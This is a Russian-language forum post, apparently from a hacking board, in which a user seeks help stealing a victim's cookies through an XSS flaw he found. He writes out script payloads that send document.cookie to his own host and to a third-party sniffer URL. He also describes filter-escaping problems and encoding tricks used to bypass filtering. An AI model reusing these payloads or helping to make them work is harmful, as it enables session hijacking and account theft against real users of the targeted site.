Показать сообщение отдельно

  #7  
Старый 21.11.2009, 11:32
xofffff
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами: 8677074

Репутация: 15
По умолчанию

Есть у кого еще какие нибудь предложения по самой простой теме
Цитата:
Я знаю вы поможете мне вы умные все ) Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif. Помогите реализовать мои коварные планы
Добавление: Если в запросе писать " то перед " он ставит знак \ из за этого способ YuNi|[c не работает так как там код c "

Код:
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=850'><
Пробовал без " все равно лог не пришел не какой.

Способ от Ctacok'a сделал все как он сказал но в cookie.txt не что не сохранилось права стоят 777

Добавление:
Пробовал кодировать что бы обойти фильтр но лог так и не пришел

Последний раз редактировалось xofffff; 21.11.2009 в 11:39..
 
Ответить с цитированием